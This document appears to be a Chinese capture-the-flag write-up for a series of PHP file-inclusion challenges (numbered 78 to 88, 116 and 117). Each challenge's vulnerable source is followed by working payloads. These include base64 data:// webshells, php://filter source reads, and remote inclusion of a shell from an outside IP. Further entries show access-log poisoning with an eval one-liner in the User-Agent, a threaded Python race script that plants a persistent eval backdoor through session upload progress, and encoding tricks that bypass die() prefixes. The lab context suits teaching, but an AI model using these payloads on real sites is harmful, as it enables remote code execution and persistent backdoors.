78
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
?file=pHp://FilTer/convert.base64-encode/resource=flag.php
79
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
80
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
?file=http://49.232.213.200/shell.txt
POST:cmd=system("tac *");
//日志包含
?file=/var/log/nginx/access.log //查看到日志格式,发现UA可控
//UA写入一句话木马
User-Agent: <?php eval($_POST[a]); ?>
或 <?=eval($_POST[a]); ?>
//注意包含后并不会讲一句话木马打印出来,因为PHP被解析,此处eval前没有加@忽略错误,所有会有警告或报错
//include含有一句话木马的log
?file=/var/log/nginx/access.log
a=system("tac f*");
81
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
日志包含,同上
82
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
相比上一题过滤了 . 无法再使用日志包含,需要包含无后缀的文件
//无数次失败
import io,threading,requests
url = 'http://67363ea2-74cc-40df-81c3-3447bff4cd9b.challenge.ctf.show/'
sessionid = 'test'
data = {
'1':"file_put_contents('/var/www/html/2.php','<?php eval($_POST[2]);?>');"
# 一句话木马写到/var/www/html/2.php
}
def write(session):
fileBytes = io.BytesIO(b'a'*1024*50)
while True:
response = session.post(url,
data={
'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
},
cookies = {
'PHPSESSID':sessionid
},
files = {
'file':('test.jpg',fileBytes)
})
# print(response.text)
def read(session):
while True:
response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
cookies = {
'PHPSESSID':sessionid
} )
response2 = session.get(url+'2.php')
if response2.status_code == 200:
print("+++++++++++done+++++++++++")
exit(0)
else:
print(response2.status_code)
if __name__ == '__main__':
event = threading.Event()
with requests.session() as session:
for i in range(2):
threading.Thread(target=write,args=(session,)).start()
for i in range(3):
threading.Thread(target=read, args=(session,)).start()
event.set()
以下几题(83~86)均可用本题脚本,因为多线程,就算有删除指令,会有进程将数据紧接着写进去
83
Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
<?php
session_unset();
session_destroy();
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
84
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*");
include($file);
}else{
highlight_file(__FILE__);
}
85
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){
die("error");
}
include($file);
}
}else{
highlight_file(__FILE__);
}
86
<?php
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
87
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
?file=php://filter/write=string.rot13/resource=1.php #url编码两次
POST:<?php eval($_POST[1]);?> #ROT13编码一次
//1.php为一句话木马文件
88
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgIHN5c3RlbSgidGFjICoiKTs/PmFh
#<?php system("tac *");?>aa
116
//打开是一个视频,把视频下载下来,分解出一张图片,是文件包含的源码。
<?php
function filter($x){
if(preg_match(' /http|https|data|input|rot13|base64|string|log|sess/i ' ,$x)){
die( 'too young too simple sometimes native!');
}
}
$file=isset($_GET['file']?$_GET['file']:"sp2.mp4");
header('Content-Type: video/mp4');
filter($file);
echo file_get_contents($file);
?>
117
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=?<hp pvela$(P_SO[T]1;)>?